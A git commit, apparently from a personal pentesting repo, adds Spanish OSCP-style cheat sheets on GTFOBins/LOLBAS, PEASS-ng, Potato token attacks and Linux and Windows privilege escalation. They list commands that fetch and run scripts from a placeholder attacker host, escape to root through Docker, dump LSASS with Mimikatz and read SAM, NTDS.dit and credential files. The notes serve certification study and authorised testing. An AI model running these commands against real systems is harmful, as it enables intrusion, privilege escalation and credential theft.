saber: pack de metodologia publico (conocimiento/) + doc del RAG

El repo trae ahora ~73 docs de metodologia de pentesting (estilo OSCP,
scrubeados de datos personales) que indexa.py indexa: un clon recien hecho ya
sabe de enumeracion, explotacion web, shells, privesc, Active Directory,
cracking... con los comandos, sin ningun dato privado. docs/rag.md lo refleja.
This commit is contained in:
sito 2026-08-16 17:58:41 +02:00
parent 12987539a4
commit 7e06ce46cf
76 changed files with 2682 additions and 8 deletions

View file

@ -0,0 +1,18 @@
# GTFOBins y LOLBAS
> Las dos chuletas que conviertes en privesc/ejecución usando binarios legítimos.
## GTFOBins (Linux) — https://gtfobins.github.io
- Dado un binario con SUID, `sudo`, o capability → cómo abusarlo para shell/leer/escribir como root.
- Flujo: `sudo -l` o `find / -perm -4000` → buscas el binario en GTFOBins.
- Ejemplo mental: `vim`, `find`, `less`, `python` con SUID → root trivial.
## LOLBAS (Windows) — https://lolbas-project.github.io
- "Living Off the Land Binaries": binarios firmados de Windows para descargar/ejecutar/bypassear.
- Útil para Transferencia de ficheros y evadir controles (`certutil`, `bitsadmin`, `mshta`...).
## Cómo encaja
- Privesc Linux → GTFOBins es el segundo paso de casi todo SUID/sudo.
- Privesc Windows → LOLBAS para vivir de la tierra.
Relacionado: Recursos públicos · OSCP MOC

View file

@ -0,0 +1,21 @@
# PEASS-ng (winPEAS / linPEAS)
> Scripts que **enumeran automáticamente** todos los vectores de privesc. En `tu carpeta`.
## Subir y ejecutar
```bash
# Kali (servir): cd tu carpeta && python3 -m http.server 80 → Transferencia de ficheros
```
```powershell
# Windows:
iwr http://TU_IP/winPEASx64.exe -OutFile C:\Windows\Temp\wp.exe ; C:\Windows\Temp\wp.exe
```
```bash
# Linux:
wget http://TU_IP/linpeas.sh -O /tmp/lp.sh ; bash /tmp/lp.sh
```
## Regla de oro
**Automatizado + manual.** winPEAS resalta lo sospechoso (rojo/amarillo), pero **revisa a mano** Privesc Windows / Privesc Linux: winPEAS no encuentra todo (ej. lógica de un script cron concreto).
Relacionado: GTFOBins y LOLBAS · Metodología OSCP · OSCP MOC

View file

@ -0,0 +1,24 @@
# Potato attacks
> Cuando `whoami /priv` muestra **SeImpersonatePrivilege** o **SeAssignPrimaryTokenPrivilege** → abuso de token a **NT AUTHORITY\SYSTEM**.
## El gatillo
```
whoami /priv → busca SeImpersonatePrivilege = Enabled
```
Típico en cuentas de servicio (IIS, MSSQL `sa`, etc.).
## La familia
```
JuicyPotato → Windows antiguos
PrintSpoofer → Windows 10/Server 2016-2019 (servicio de impresión)
GodPotato → moderno, muy fiable hoy
RoguePotato / RottenPotato → variantes
```
## Uso típico (GodPotato/PrintSpoofer)
```
GodPotato.exe -cmd "cmd /c whoami"
PrintSpoofer.exe -i -c cmd
```
Subes el .exe con Transferencia de ficheros.

View file

@ -0,0 +1,25 @@
# Privesc Linux
> Tras el foothold (Reverse shell + Estabilizar shell TTY): script automatizado (PEASS-ng) **+** revisión manual. Paso 4 de la Metodología OSCP.
## Los 10 olvidados
```
1. sudo -l → SIEMPRE primero, sin password
2. SUID exóticos → find / -perm -4000 2>/dev/null → GTFOBins y LOLBAS
3. Capabilities → getcap -r / 2>/dev/null (cap_setuid en python/perl = root)
4. Cron escribibles → /etc/crontab, /var/spool/cron (scripts que puedes editar)
5. Wildcard injection → tar czf /backup/* con --checkpoint
6. PATH abuse → script SUID llama "ps" sin ruta → creas ./ps malicioso
7. NFS no_root_squash → showmount -e ; montas y subes un SUID
8. Docker group → docker run -v /:/mnt -it alpine chroot /mnt (= root)
9. Kernel exploits → último recurso: DirtyCow, DirtyPipe (uname -a; searchsploit)
10. Ficheros sensibles → /etc/passwd escribible, /etc/shadow legible, /var/backups
```
## Orden recomendado
`sudo -l` → SUID/caps + GTFOBins y LOLBAS → cron → resto. **Kernel exploit = último recurso** (inestable) → Exploits conocidos.
## Herramientas
`linpeas.sh` (PEASS-ng), `LinEnum`, `linux-exploit-suggester` (LES), `lse.sh`, y `pspy` (espía cron/procesos sin root). Ver Herramientas (índice).
Relacionado: Exploits conocidos · PEASS-ng · Privesc Windows · OSCP MOC

View file

@ -0,0 +1,41 @@
# Privesc Windows
> Tras la Reverse shell PowerShell: PEASS-ng (winPEAS) **+** revisión manual. Camino a SYSTEM.
## Los 10 olvidados
```
1. whoami /priv → SeImpersonate/SeAssignPrimaryToken → Potato attacks
2. Unquoted services → wmic service get name,pathname,startmode
path con espacios sin comillas + carpeta escribible = exe propio
3. AlwaysInstallElev. → reg query HKLM\...\Windows\Installer (ambos =1 → msi = SYSTEM)
4. Service permisos → accesschk.exe -uwcqv user * (SERVICE_CHANGE_CONFIG)
5. Creds en disco → Unattend.xml, sysprep.inf, web.config, cmdkey /list, SAM/SYSTEM
6. AutoLogon registro → HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
7. Pass spraying → la pass del user normal contra admin/administrator/sa
8. WSL / OpenSSH → credenciales en .bash_history
9. Scheduled tasks → schtasks /query /fo LIST /v (scripts editables)
10. UAC bypass + token impersonation
```
## Privilegios de token (SeXxxPrivilege)
```
SeImpersonate / SeAssignPrimaryToken → Potato attacks
SeBackupPrivilege → lees ficheros restringidos (copias SAM/SYSTEM, NTDS.dit)
SeRestorePrivilege → escribes donde quieras: sustituye utilman.exe por cmd.exe
SeDebugPrivilege → vuelcas LSASS → Mimikatz
SeTakeOwnership → te apropias de objetos protegidos
```
## Otras técnicas (del sitio)
- **DLL hijacking**: servicio que carga una DLL por ruta insegura → pones tu DLL (msfvenom `-f dll`) y reinicias el servicio.
- **UAC bypass** vía `eventvwr.exe` (hijack de registro) cuando ya tienes código en un user del grupo Administrators.
- **Unattend.xml / cmdkey / registro** → credenciales en disco (ya en los 10 olvidados).
## Herramientas
`PowerUp`, `PrivescCheck`, `Sherlock` (PowerShell) + `accesschk.exe` (SysInternals) → ver Herramientas (índice) y PEASS-ng.
## Tras conseguir SYSTEM
- Mimikatz → `sekurlsa::logonpasswords` → hashes/creds de dominio.
- Esas creds → Movimiento lateral y Active Directory.
Relacionado: Potato attacks · Exploits conocidos · PEASS-ng · Privesc Linux · OSCP MOC